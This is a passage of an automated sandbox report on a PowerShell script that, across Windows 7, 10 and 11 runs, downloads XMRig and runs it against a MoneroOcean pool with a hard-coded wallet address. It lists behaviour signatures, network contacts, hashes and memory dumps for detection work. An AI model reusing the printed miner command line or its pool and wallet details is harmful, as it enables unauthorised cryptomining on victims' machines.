| PID 4988 wrote to memory of 1576 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 138.91.171.81:80 | | tcp |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
Files
memory/4988-2-0x00007FF8F2423000-0x00007FF8F2424000-memory.dmp
memory/4988-5-0x000001F9705C0000-0x000001F9705E2000-memory.dmp
memory/4988-8-0x00007FF8F2420000-0x00007FF8F2E0C000-memory.dmp
memory/4988-9-0x000001F970BE0000-0x000001F970C56000-memory.dmp
memory/4988-10-0x00007FF8F2420000-0x00007FF8F2E0C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v3dwu0dw.hlq.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4988-25-0x00007FF8F2420000-0x00007FF8F2E0C000-memory.dmp
memory/4988-48-0x000001F970C60000-0x000001F970C72000-memory.dmp
memory/4988-61-0x000001F970A40000-0x000001F970A4A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1576-90-0x00000220020C0000-0x00000220020E0000-memory.dmp
memory/1576-91-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/4988-92-0x00007FF8F2423000-0x00007FF8F2424000-memory.dmp
memory/4988-93-0x00007FF8F2420000-0x00007FF8F2E0C000-memory.dmp
memory/1576-94-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-95-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-96-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-97-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-98-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-99-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-100-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-101-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-102-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-103-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-104-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-105-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-106-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-107-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-108-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-109-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-110-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-111-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-112-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-113-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-114-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-115-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-116-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-117-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-118-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-119-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-120-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-121-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-122-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-123-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-124-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-125-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-126-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-127-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-128-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-129-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-130-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-131-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-132-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-133-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-134-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-135-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-136-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-137-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-138-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-139-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-140-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-141-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-142-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-143-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-144-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-145-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-146-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-147-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-148-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-149-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-150-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-151-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-152-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-153-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-154-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
memory/1576-155-0x00007FF7A2310000-0x00007FF7A2F43000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:40
Platform
win7-20231129-en
Max time kernel
1559s
Max time network
1563s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
Network
Files
memory/1988-4-0x000007FEF534E000-0x000007FEF534F000-memory.dmp
memory/1988-8-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp
memory/1988-7-0x0000000001E80000-0x0000000001E88000-memory.dmp
memory/1988-6-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp
memory/1988-5-0x000000001B640000-0x000000001B922000-memory.dmp
memory/1988-10-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp
memory/1988-9-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp
memory/1988-11-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp
memory/1988-12-0x000007FEF5090000-0x000007FEF5A2D000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:40
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1781s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3608 wrote to memory of 780 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3608 wrote to memory of 780 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| NL | 52.111.243.31:443 | | tcp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 138.91.171.81:80 | | tcp |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
Files
memory/3608-2-0x00007FF8BC563000-0x00007FF8BC564000-memory.dmp
memory/3608-5-0x000001E07F6B0000-0x000001E07F6D2000-memory.dmp
memory/3608-6-0x00007FF8BC560000-0x00007FF8BCF4C000-memory.dmp
memory/3608-9-0x000001E07F860000-0x000001E07F8D6000-memory.dmp
memory/3608-10-0x00007FF8BC560000-0x00007FF8BCF4C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pmbrkdz5.d2k.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3608-25-0x00007FF8BC560000-0x00007FF8BCF4C000-memory.dmp
memory/3608-48-0x000001E07F9E0000-0x000001E07F9F2000-memory.dmp
memory/3608-61-0x000001E07F840000-0x000001E07F84A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/780-90-0x0000029463790000-0x00000294637B0000-memory.dmp
memory/780-91-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/3608-92-0x00007FF8BC563000-0x00007FF8BC564000-memory.dmp
memory/3608-93-0x00007FF8BC560000-0x00007FF8BCF4C000-memory.dmp
memory/780-94-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-95-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-96-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-97-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-98-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-99-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-100-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-101-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-102-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-103-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-104-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-105-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-106-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-107-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-108-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-109-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-110-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-111-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-112-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-113-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-114-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-115-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-116-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-117-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-118-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-119-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-120-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-121-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-122-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-123-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-124-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-125-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-126-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-127-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-128-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-129-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-130-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-131-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-132-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-133-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-134-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-135-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-136-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-137-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-138-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-139-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-140-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-141-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-142-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-143-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-144-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-145-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-146-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-147-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-148-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-149-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-150-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-151-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-152-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-153-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-154-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
memory/780-155-0x00007FF72C480000-0x00007FF72D0B3000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-01 18:30
Reported
2024-06-10 16:23
Platform
win11-20240426-en
Max time kernel
1799s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4728 wrote to memory of 4320 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4728 wrote to memory of 4320 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/4728-0-0x00007FFD97883000-0x00007FFD97885000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s2tepunc.5yf.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4728-9-0x000002B9CD4C0000-0x000002B9CD4E2000-memory.dmp
memory/4728-10-0x00007FFD97880000-0x00007FFD98342000-memory.dmp
memory/4728-11-0x00007FFD97880000-0x00007FFD98342000-memory.dmp
memory/4728-12-0x00007FFD97880000-0x00007FFD98342000-memory.dmp
memory/4728-14-0x000002B9E59B0000-0x000002B9E59C2000-memory.dmp
memory/4728-15-0x000002B9CD4F0000-0x000002B9CD4FA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4320-46-0x000001A46FA50000-0x000001A46FA70000-memory.dmp
memory/4320-47-0x000001A471450000-0x000001A471470000-memory.dmp
memory/4320-48-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4728-49-0x00007FFD97880000-0x00007FFD98342000-memory.dmp
memory/4320-50-0x000001A471470000-0x000001A471490000-memory.dmp
memory/4320-51-0x000001A471490000-0x000001A4714B0000-memory.dmp
memory/4728-53-0x00007FFD97883000-0x00007FFD97885000-memory.dmp
memory/4320-52-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-54-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-55-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-56-0x000001A471470000-0x000001A471490000-memory.dmp
memory/4320-57-0x000001A471490000-0x000001A4714B0000-memory.dmp
memory/4320-58-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-59-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-60-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-61-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-62-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-63-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-64-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-65-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-66-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-67-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-68-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-69-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-70-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-71-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
memory/4320-72-0x00007FF6D30A0000-0x00007FF6D3CD3000-memory.dmp
